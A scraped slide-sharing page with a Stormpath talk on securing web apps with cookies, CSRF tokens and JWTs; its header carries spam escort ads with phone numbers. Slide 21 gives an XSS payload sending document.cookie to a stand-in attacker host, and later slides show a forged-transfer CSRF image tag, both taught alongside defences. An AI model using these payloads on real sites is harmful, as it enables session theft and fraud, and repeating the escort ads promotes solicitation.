Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
 
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
 
result management system report for college project
result management system report for college projectresult management system report for college project
result management system report for college project
 
Roadmap to Membership of RICS - Pathways and Routes
Roadmap to Membership of RICS - Pathways and RoutesRoadmap to Membership of RICS - Pathways and Routes
Roadmap to Membership of RICS - Pathways and Routes
 
Porous Ceramics seminar and technical writing
Porous Ceramics seminar and technical writingPorous Ceramics seminar and technical writing
Porous Ceramics seminar and technical writing
 
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdfONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
 
AKTU Computer Networks notes --- Unit 3.pdf
AKTU Computer Networks notes --- Unit 3.pdfAKTU Computer Networks notes --- Unit 3.pdf
AKTU Computer Networks notes --- Unit 3.pdf
 
MANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLS
MANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLSMANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLS
MANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLS
 

Building Secure User Interfaces With JWTs

  • 1. Building Secure User Interfaces With JWTs (JSON Web Tokens) Robert Damphousse @robertjd_ Lead Front-End Developer, Stormpath
  • 3. About Me • Full-stack developer 10 years • Full-stack with JavaScript since 2011 (Node.js + Angular) • Currently leading JavaScript at Stormpath
  • 4. About Stormpath • Cloud-based User Identity API for Developers • Authentication and Authorization as-as-service • RESTful API • Active Directory, LDAP, and SAML Integration • Private Deployments (AWS) • Free plan for developers
  • 5. Talk Overview • Security Concerns for Modern Web Apps • Cookies, The Right Way • Session ID Problems • Token Authentication to the rescue! • Angular Examples
  • 6. Structure of Modern Web Apps • Back-end: a RESTful JSON API • Client is usually an HTML5 Environment: • Single Page Apps (“SPAs”), e.g AngularJS, React • WebKit instance • “Hybrid” Mobile apps (Phonegap, etc)
  • 7. Security Concerns for Modern Web Apps As a developer, you need to: • Secure user credentials • Secure server endpoints (API) • Prevent malicious code from executing in client • Provide Access Control information to the Client
  • 9. We accept username & password, then store a Session ID in a cookie and associate that session with the user.
  • 10. Securing User Credentials: Session ID Cookie
  • 11. • This is OK if you protect your cookies • Session ID  Session  User identity • Use a web framework like Apache Shiro or Spring Security to assert security rules, roles stored in a database.
  • 12. Session ID Problems • They’re opaque and have no meaning themselves (they’re just ‘pointers’) • Session ID  look up server state on *every request*. • Cannot be used for inter-op with other services • JWTs can help with this, but we’ll still use cookies
  • 14. Cookies, The Right Way ® Cookies can be easily compromised • Man-in-the-Middle (MITM) • Cross-Site Scripting (XSS) • Cross-Site Request Forgery (CSRF)
  • 15. Man In The Middle (MITM) Attack Someone ‘listening on the wire’ between the browser and server can see and copy the cookie. Solutions • Use HTTPS/TLS everywhere a cookie will be in transit • Set Secure flag on cookies
  • 17. XSS Attacks This is a very REAL problem Happens when someone else can execute code inside your website Can be used to steal your cookies! https://www.owasp.org/index.php/XSS
  • 21. XSS Attack Demo <img src=x onerror="document.body.appendChild(function (){var a = document.createElement('img'); a.src='https://hackmeplz.com/yourCookies.pn g/?cookies=’ +document.cookie;return a}())" So what if I put this in the chatbox..
  • 23.
  • 24. XSS Attack – What Can I Do? Escape Content • Server-side: Use well-known, trusted libraries to ensure dynamic HTML does not contain executable code. Do NOT roll your own. • Client Side: Escape user input from forms (some frameworks do this automatically, read docs!)
  • 25. XSS Attack – What Can I Do? Use HTTPS-Only cookies Set the HttpOnly flag on your authentication cookies. HttpOnly cookies are NOT accessible by the JavaScript environment
  • 26. XSS Attack – What Can I Do? Read this definitive guide: https://www.owasp.org/index.php/XSS
  • 28. Cross-Site Request Forgery (CSRF) Exploits the fact that HTML tags do NOT follow the Same Origin Policy when making GET requests https://www.owasp.org/index.php/Cross- Site_Request_Forgery_(CSRF) https://developer.mozilla.org/en- US/docs/Web/Security/Same-origin_policy
  • 29. Cross-Site Request Forgery (CSRF) Example: Attacker puts malicious image into a web page that the user visits: <img src=“https://myapp.com/transferMone y?to=BadGuy&amount=10000”/> .. what happens?
  • 30. Cross-Site Request Forgery (CSRF) • The browser complies, “The request is going to myapp.com, so I’ll happily send along your cookies for myapp.com!” • Your server trusts the cookies AND the user it identifies, and transfers the money!
  • 31. Cross-Site Request Forgery (CSRF) Solutions: • Synchronizer Token (for form-based apps) • Double-Submit Cookie (for modern apps) • Origin header check (for extra measure)
  • 32. Double Submit Cookie • Give client two cookies: (1) Session ID and (2) a strong random value • Client sends back the random value in a custom HTTP header, triggering the Same- Origin-Policy
  • 33. http://myapp.com/login Login Username Password yo@foo.com ••••••••••••••• Login WWW Server (1) POST /login (2) 200 OK Set-Cookie: session=dh7jWkx8fj; Set-Cookie: xsrf-token=xjk2kzjn4; http://myapp.com/profile Kitsch mustache seitan, meggings Portland VHS ethical ugh. Messenger bag pour-over deep v semiotics, Portland before they sold out small batch slow-carb PBR PBR&B chia synth vegan bitters Brooklyn. (3) GET /profile (4) 200 OK Cookie: session=dh7jWkx8fj; xsrf-token=xjk2kzjn4 X-XSRF-Token: xjk2kzjn4; Hello, Yo Cookie == Header ?
  • 34. WWW Server http://hackerzapp.com/ req.setHeader(‘X-XSRF- Token’,’stolen token’) BROWSER ERROR No 'Access-Control-Allow- XSRF-Token’ header is present on the requested resource. GET http://myapp.com/profile http://hackerzapp.com/ <img src=“https:// yoursite.com/ transferMoney? to=BadGuy&amount=10000”/> (1) GET /transferMoney? (2) 400 Invalid Token Server rejects forged requests, CSRF token header is missing Browser rejects forged cross-domain AJAX attempts Cookie: session=dh7jWkx8fj; xsrf-token=xjk2kzjn4 Cookie == Header ?
  • 35. CORS Warning! BEWARE OF THIS ADVICE: Access-Control-Allow-Origin: * Access-Control-Allow-Headers:* DISABLES SAME-ORIGIN POLICY
  • 36. Origin Header check • Browsers send Origin header • Tells your server where the request is coming from • Cannot be modified by JavaScript • CAN be modified by a malicious HTTP Proxy (use HTTPS!)
  • 38. We’re about to go from here: ..to here
  • 39. Token Auth – All you need to know Authentication is proving who you are The token is a way of persisting that proof JSON Web Tokens (JWTs) are a token format JWTs are often used for the access token and refresh token in Oauth2 workflows
  • 40. JWTs are fun – let’s go! 
  • 41. JSON Web Tokens (JWT) In the wild they look like just another ugly string: eyJ0eXAiOiJKV1QiLA0KICJhbGciOiJIUzI1NiJ9.eyJ pc3MiOiJqb2UiLA0KICJleHAiOjEzMDA4MTkzODAsDQo gImh0dHA6Ly9leGFtcGxlLmNvbS9pc19yb290Ijp0cnV lfQ.dBjftJeZ4CVPmB92K27uhbUJU1p1r_wW1gFWFOEj Xk
  • 42. JSON Web Tokens (JWT) But they do have a three part structure. Each part is a Base64-URL encoded string: eyJ0eXAiOiJKV1QiLA0KICJhb GciOiJIUzI1NiJ9 . eyJpc3MiOiJqb2UiLA0KICJle HAiOjEzMDA4MTkzODAsDQogIm h0dHA6Ly9leGFtcGxlLmNvbS9 pc19yb290Ijp0cnVlfQ . dBjftJeZ4CVPmB92K27uhbUJU 1p1r_wW1gFWFOEjXk Header Body (‘Claims’) Cryptographic Signature
  • 43. JSON Web Tokens (JWT) Base64-decode the parts to see the contents: { "typ":"JWT", "alg":"HS256" } { "iss”:”http://trustyapp.com/”, "exp": 1300819380, “sub”: ”users/8983462”, “scope”: “self api/buy” } tß´—™à%O˜v+nî…SZu¯µ€U…8H× Header Body (‘Claims’) Cryptographic Signature
  • 44. JSON Web Tokens (JWT) The claims body is the best part! It asserts: { "iss": "http://trustyapp.com/", "exp": 1300819380, "sub": "users/8983462", "scope": "self api/buy" } Who issued the token When it expires Who it represents What they can do
  • 45. Issuing JWTs • User has to present credentials to get a token (password, api keys). • Tokens are issued by your server, and signed with a secret key that is private. • The client stores the tokens, and uses them to authenticate requests
  • 46. Verifying JWTs • Just check the signature and expiration time! Stateless authentication! • Token declares scope, make authorization decisions locally. • But.. How to revoke stateless authentication?
  • 47. Storing JWTs • Local Storage is not secure (XSS vulnerable) • Use HttpOnly, Secure cookies to store access tokens in the browser. • Cookies provide an automatic way of supplying the tokens on requests • CSRF protection is essential!
  • 49. JWT + OAuth2 • OAuth2 (RFC 6749) is an “Authorization Framework” (and a good sleep aid). • It defines the “Resource Owner Password Credentials Grant” • In other words: exchange username and password for an access token and refresh token
  • 50. JWT + OAuth2 • The access token has a short lifetime, and can use stateless trust – a signed JWT! • The refresh token has a long lifetime and is used to obtain more access tokens. Access tokens should can be revoked (database).
  • 51. The Access Token and Refresh Token paradigm is designed to give you control over the implicit-trust tradeoff that is made with stateless tokens
  • 52. Access & Refresh Tokens Refresh token sets the maximum lifetime of the authenticated context. Authentication token sets the maximum time of the stateless authentication context Authentication context is revoked by revoking the refresh token
  • 53. Examples • Uber-secure banking application (want to force user out often): • Access token TTL = 1 minutes • Refresh token TTL = 30 minutes • Mobile/social app (user should “always be logged in”) • Access token TTL = 1 hour • Refresh token TTL = 4 years (lifetime of mobile device)
  • 55. Angular App w/ Login Form
  • 56. Login makes POST to /login POST /login Origin: http://localhost:9000 username=robert%40stormpath.com &password=robert%40stormpath.com
  • 57. Server Response HTTP/1.1 200 OK set-cookie: access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJ IUzI1NiJ9.ZJD3YlPMq38IcxN335Umeflnte1nFPDEvoSl26rSXk g…; Expires=Wed, 13 May 2015 07:15:33 GMT; HttpOnly;Path=/; set-cookie: refresh_token=eyJ0iI2NldURFJVJkNZhbGciO iJIUzI1NiJ9.9ybXBhdGguY29tL3YxL2FwcGxpY2F0aW9ucy8…; Expires=Wed, 13 Jun 2015 07:15:33 GMT; HttpOnly;Path=/;
  • 59. Server Request Handler – Auth Logic • Is the access token valid (signature & expiration)? • Yes? Allow the request • No? Try to get a new access token, using the refresh token • Did that work? • Yes? Allow the request, send new access token on response as cookie • No? Reject the request, delete refresh token cookie
  • 60. Recap
  • 61. • Cookies need to be secured! • JWTs are an improvement on the opaque session identifier. • Access Token + Refresh Token is as useful strategy for scaling. • OAuth2 will put you to sleep.
  • 63. Use Stormpath for API Authentication & Security Our API and libraries give you a cloud-based user database and web application security in no time! Get started with your free Stormpath developer account: https://api.stormpath.com/register Questions? support@stormpath.com